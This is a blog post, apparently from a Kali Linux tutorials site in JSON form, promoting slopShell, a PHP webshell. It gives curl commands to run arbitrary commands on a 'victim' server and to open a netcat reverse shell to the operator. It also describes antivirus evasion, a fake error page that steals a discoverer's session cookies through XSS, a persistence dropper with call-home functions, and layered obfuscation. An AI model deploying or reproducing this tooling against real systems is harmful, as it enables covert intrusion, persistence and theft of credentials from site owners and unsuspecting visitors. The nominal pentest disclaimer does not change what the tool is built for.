{"id":13376,"date":"2021-06-16T15:16:42","date_gmt":"2021-06-16T09:46:42","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=13376"},"modified":"2021-06-16T15:16:42","modified_gmt":"2021-06-16T09:46:42","slug":"slopshell","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/slopshell\/","title":{"rendered":"slopShell : The Only Php Webshell You Need"},"content":{"rendered":"\n<p><strong>slopShell<\/strong> is the only Php Webshell You Need . Since I derped, and forgot to talk about usage. Here goes.<\/p>\n\n\n\n<p>For this shell to work, you need 2 things, a victim that allows php file upload(yourself, in an educational environment) and a way to send http requests to this webshell.<\/p>\n\n\n\n<p>Thank you for all the support the community has given, it means alot to us. Now for things that will be added to this shell, to make it even more awesome.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Mutual TLS, with the ability to generate a CA on the fly(if thats possible)<\/li><li>More refined dropper\/shell itself, to ensure that the shell will not be stumbled upon for prolonged access.<\/li><\/ul>\n\n\n\n<p>Basic Usage Video(Hosted on Youtube):<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/--Xca1Nofetg\/YL8Dk4DdciI\/AAAAAAAAJX4\/dDYp8lZ1eGEmXpmq4BRlvSOzu6Uyp_rLQCLcBGAsYHQ\/s1280\/1.webp\" alt=\"\"\/><\/figure>\n\n\n\n<p>Current VT Detection ratio: 2\/59<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/camo.githubusercontent.com\/d028e5436a2c8c4585c0fb8df431869f24c9fefed9f7e66ace6c9d47bcc398f0\/68747470733a2f2f7777772e7669727573746f74616c2e636f6d2f6775692f696d616765732f56545f7365617263685f686173682e737667\" alt=\"Virus Total\"\/><\/figure>\n\n\n\n<p>Current VT Detection ratio (obfuscated version): 0\/59<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/camo.githubusercontent.com\/d028e5436a2c8c4585c0fb8df431869f24c9fefed9f7e66ace6c9d47bcc398f0\/68747470733a2f2f7777772e7669727573746f74616c2e636f6d2f6775692f696d616765732f56545f7365617263685f686173682e737667\" alt=\"Virus Total\"\/><\/figure>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>SetUp<\/strong><\/p>\n\n\n\n<p>Ok, so here we go folks, there was an itch I had to write something in PHP so this is it. This webshell has a few bells and whistles, and more are added everyday. You will need a pgsql server running that you control. However you implement that is on you.<\/p>\n\n\n\n<p>Debian:&nbsp;<code><strong>apt install -y postgresql php php-pear &amp;&amp; python -m pip install proxybroker --user<\/strong><\/code><\/p>\n\n\n\n<p>RHEL Systems:&nbsp;<code><strong>dnf -y -b install postgresql-server postgresql php php-pear &amp;&amp; python -m pip install proxybroker --user<\/strong><\/code><\/p>\n\n\n\n<p>WIN:&nbsp;<code><strong>install the php msi, and make sure you have an active postgresql server that you can connect to running somewhere. figure it out.<\/strong><\/code><\/p>\n\n\n\n<p>Once you have these set up properly and can confirm that they are running. A command I would encourge using is with&nbsp;<strong><code>pg_ctl<\/code>&nbsp;<\/strong>you can create the DB that way, or at least init it and start it. Then all the db queries will work fine.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>How To Interact<\/strong><\/p>\n\n\n\n<p><strong>CLIFFNOTE: <\/strong>For the anti analysis routines, I(oldkingcone) would love to try and take credit for this idea, but I cannot in good conscience, so the inspiration came from 1 person(you know who you are, you evil genius.) whom pointed me to this repo:&nbsp;<a href=\"https:\/\/github.com\/NullArray\/Archivist\/blob\/master\/logger.py#L123\">https:\/\/github.com\/NullArray\/Archivist\/blob\/master\/logger.py#L123<\/a>&nbsp;Firstly, you need to choose a valid User-Agent to use, this is kind of like a first layer of protection against your webshell being accidentally stumbled upon by anyone but you. I went with sp\/1.1 as its a non typical user-agent used. This can cause red flags in a pentest, and your access or script to be blocked or deleted. So, be smart about it. Code obfuscation wouldnt hurt, I did not add that in because thats on you to decide. To use the shell, there are some presets to aid you in your pen test and traversal of the machine. I did not add much for windows, because I do not like developing for windows. If you have routines or tricks added or know about, feel free to submit an issue with your suggestion and ill add it. An example of how to use this webshell with curl:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><code><strong>curl https:\/\/victim\/slop.php?qs=cqP -H \"User-Agent: sp\/1.1\" -v<\/strong><\/code><\/p>\n\n\n\n<p>or to execute custom commands:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><code><strong>curl https:\/\/victim\/slop.php --data \"commander=id\" -H \"User-Agent: sp\/1.1\" -v<\/strong><\/code><\/p>\n\n\n\n<p>Or to attempt to establish a reverse shell to your machine:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><code><strong>curl https:\/\/victim\/slop.php --data \"rcom=1&amp;mthd=nc&amp;rhost=&amp;rport=&amp;shell=sh\" -H \"User-Agent: sp\/1.1\" -v<\/strong><\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>mthd = the method you want to use to establish the reverse shell, this is predefined in the&nbsp;<code><strong>$comma<\/strong><\/code>&nbsp;array, feel free to add to it, optional, if it is null, the script will choose for you.<\/li><li>rhost = you, now this and the rport are not required, as it defaults to using netcat with the ip address in the&nbsp;<code><strong>$_SERVER[\"REMOTE_ADDR\"]<\/strong><\/code>&nbsp;php env variable.<\/li><li>rport = your listener port, the default was set to 1634, just because.<\/li><li>shell = the type of system shell you want to have. I know bash isnt standard on all systems, but thats why its nice for you to do some system recon before you try to execute this command.<\/li><\/ul>\n\n\n\n<p>Here is the better part of this shell. If someone happens upon this shell without supplying the exact user agent string specified in the script, this shell will produce a 500 error with a fake error page then it will attempt some XSS to steal that users session information and sends it back to a handler script on your server\/system. This will then attempt to store the information in a running log file. If it is unable to do so, well the backup is your logs. Once the XSS has completed, this shell will redirect the user back to the root(\/) of the webserver. So, youll steal sessions if someone finds this, can even beef it up to execute commands on the server on behalf of the user, or drop a reverse shell on the users browser through Beef or another method. The possibilities are legit endless.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Images Of Use Cases<\/strong><\/p>\n\n\n\n<p>In browser, navigated to without the proper user-agent string. (1st level of auth)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-silFUIW8x0U\/YL8Gaiq5-TI\/AAAAAAAAJYA\/eqOPWdFnIywKGyUN3gjPRdUaSrF-IGy4wCLcBGAsYHQ\/s1359\/4.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Use in the terminal, which is how this was designed to work, using curl with the -vH &#8220;User-Agent: sp1.1&#8221; switches.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-n9JnlY1JF8w\/YL8GtW5pyCI\/AAAAAAAAJYI\/r8ABakKNe4MUMqRP8lf8BL9IiHj7JPtoQCLcBGAsYHQ\/s896\/5.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Obfuscated script example:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-zxECY5i2ElA\/YL8G5yirvVI\/AAAAAAAAJYM\/sVCWgEAtFVgVPARRlUpoUgjHThIa7k2ewCLcBGAsYHQ\/s1822\/6.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>Generation 2 obfuscated script:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-VD_6lPPpndY\/YL8HI8L8YMI\/AAAAAAAAJYQ\/cVm7CIySTfIEMIsiVPF68eXeok5sQUwRgCLcBGAsYHQ\/s1341\/7.png\" alt=\"\"\/><\/figure>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Interacting Through The Client Script<\/strong><\/p>\n\n\n\n<p>Once the client script is complete, you as the operator will not need to interact though curl to utilize this shell. There will be a client script that you can use to execute all commands\/control over. In addition to this client script, there is a dropper. This dropper will ensure the script is run at start up even if the website is removed. Including some call home functions, obfuscation if it is requested on a level from 1 to 3, with 3 being the highest as every function will be rot ciphered and then encoded in base64 within the whole file being base64 encoded with a random name assigned to the file itself. This can help avoid signature detection.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Encryption<\/strong><\/p>\n\n\n\n<p>Once the encryption routine is fully worked out, the dropper script will be encrypted, and highly obfuscated. Example output:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>Base64 decoded: also a test 123<br>Re-Encoded: YWxzbyBhIHRlc3QgMTIz<br>Key: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e<br>Key Length: 96<br>Encryption Result:<br>Array<br>(<br>[original] =&gt; also a test 123<br>[key] =&gt; 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e<br>[encrypted] =&gt; meIHs\/y6_U7U~7(M<br>[base64_Encoded] =&gt; bWVJSAAdcw4veTZfVQU3VX43KE0=<br>)<br>Decrypt Test:<br>Array<br>(<br>[key] =&gt; 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e<br>[encrypted] =&gt; meIHs\/y6_U7U~7(M<br>[decrypted] =&gt; YWxzbyBhIHRlc3QgMTIz<br>[base64_decoded] =&gt; also a test 123<br>[original] =&gt; also a test 123<br>)<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Additional<\/strong><\/p>\n\n\n\n<p>This was going to remain private. But I decided otherwise.<\/p>\n\n\n\n<p>Do not abuse this shell, and get a signature attached to it, this is quite stealthy right now since its brand new.<\/p>\n\n\n\n<p>I as the maintainer, am in no way responsible for the misuse of this product. This was published for legitmate penetration testing\/red teaming purposes, and\/or for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.<\/p>\n\n\n\n<p>If you have enjoyed this script, its is obligatory that you follow me and throw a star on this repo&#8230; because future editions will have more features(or bugs) depending on how you look at it.<\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/oldkingcone\/slopShell\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>slopShell is the only Php Webshell You Need . Since I derped, and forgot to talk about usage. Here goes. For this shell to work, you need 2 things, a victim that allows php file upload(yourself, in an educational environment) and a way to send http requests to this webshell. Thank you for all the [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16876,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","fifu_image_alt":"slopShell : The Only Php Webshell You Need","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[2521,3131],"class_list":["post-13376","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-php-webshell","tag-slopshell"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>slopShell : The Only PHP Webshell You Need!!Kalilinuxtutorials<\/title>\n<meta name=\"description\" content=\"slopShell is the only PHP Webshell You Need. A victim that allows php file upload and a way to send http requests to this webshell.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/slopshell\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"slopShell : The Only PHP Webshell You Need!!Kalilinuxtutorials\" \/>\n<meta property=\"og:description\" content=\"slopShell is the only PHP Webshell You Need. A victim that allows php file upload and a way to send http requests to this webshell.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/slopshell\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-16T09:46:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"slopShell : The Only Php Webshell You Need\",\"datePublished\":\"2021-06-16T09:46:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/\"},\"wordCount\":1162,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png\",\"keywords\":[\"Php Webshell\",\"slopShell\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/\",\"name\":\"slopShell : The Only PHP Webshell You Need!!Kalilinuxtutorials\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png\",\"datePublished\":\"2021-06-16T09:46:42+00:00\",\"description\":\"slopShell is the only PHP Webshell You Need. A victim that allows php file upload and a way to send http requests to this webshell.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/slopshell\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"slopShell : The Only PHP Webshell You Need!!Kalilinuxtutorials","description":"slopShell is the only PHP Webshell You Need. A victim that allows php file upload and a way to send http requests to this webshell.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/slopshell\/","og_locale":"en_US","og_type":"article","og_title":"slopShell : The Only PHP Webshell You Need!!Kalilinuxtutorials","og_description":"slopShell is the only PHP Webshell You Need. A victim that allows php file upload and a way to send http requests to this webshell.","og_url":"https:\/\/kalilinuxtutorials.com\/slopshell\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2021-06-16T09:46:42+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"slopShell : The Only Php Webshell You Need","datePublished":"2021-06-16T09:46:42+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/"},"wordCount":1162,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","keywords":["Php Webshell","slopShell"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/","url":"https:\/\/kalilinuxtutorials.com\/slopshell\/","name":"slopShell : The Only PHP Webshell You Need!!Kalilinuxtutorials","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","datePublished":"2021-06-16T09:46:42+00:00","description":"slopShell is the only PHP Webshell You Need. A victim that allows php file upload and a way to send http requests to this webshell.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/slopshell\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/slopshell\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-GTQ9NYtnRpc\/YMS_Cnk9iOI\/AAAAAAAAJe0\/UcaAX6pK-b4pJIWmGIuRLtfFjKvJrRYwgCLcBGAsYHQ\/s728\/slopShell%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":23816,"url":"https:\/\/kalilinuxtutorials.com\/pyshell\/","url_meta":{"origin":13376,"position":0},"title":"PyShell : Multiplatform Python WebShell","author":"R K","date":"April 8, 2022","format":false,"excerpt":"PyShell\u00a0is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgmDMZf4hRiZGa-gSAnzfb5yxaGfkZpljCgGGCItBztheqINHxx85OgZxPN2UdZdPQnU_yFLvmPrPwR0XJiBVmrC_KRsohZvd0bVsjuwSqtxGWohUM4OXl-rgF3gsUSJzL69c80lJAy1QBzUU3gTLqXi2__cMfJTJ4nKryoE3Dl_rrQvpjHhj9Hsnm1\/s728\/PyShell%20logo%20%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgmDMZf4hRiZGa-gSAnzfb5yxaGfkZpljCgGGCItBztheqINHxx85OgZxPN2UdZdPQnU_yFLvmPrPwR0XJiBVmrC_KRsohZvd0bVsjuwSqtxGWohUM4OXl-rgF3gsUSJzL69c80lJAy1QBzUU3gTLqXi2__cMfJTJ4nKryoE3Dl_rrQvpjHhj9Hsnm1\/s728\/PyShell%20logo%20%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgmDMZf4hRiZGa-gSAnzfb5yxaGfkZpljCgGGCItBztheqINHxx85OgZxPN2UdZdPQnU_yFLvmPrPwR0XJiBVmrC_KRsohZvd0bVsjuwSqtxGWohUM4OXl-rgF3gsUSJzL69c80lJAy1QBzUU3gTLqXi2__cMfJTJ4nKryoE3Dl_rrQvpjHhj9Hsnm1\/s728\/PyShell%20logo%20%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgmDMZf4hRiZGa-gSAnzfb5yxaGfkZpljCgGGCItBztheqINHxx85OgZxPN2UdZdPQnU_yFLvmPrPwR0XJiBVmrC_KRsohZvd0bVsjuwSqtxGWohUM4OXl-rgF3gsUSJzL69c80lJAy1QBzUU3gTLqXi2__cMfJTJ4nKryoE3Dl_rrQvpjHhj9Hsnm1\/s728\/PyShell%20logo%20%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":28795,"url":"https:\/\/kalilinuxtutorials.com\/mimicry\/","url_meta":{"origin":13376,"position":1},"title":"Mimicry : Security Tool For Active Deception In Exploitation And Post-Exploitation","author":"R K","date":"May 9, 2023","format":false,"excerpt":"Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation. Active deception can live migrate the attacker to the honeypot without awareness. We can achieve a higher security level at a lower cost with Active deception. Demo Quick Start 1. Make sure docker, docker-compose\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali 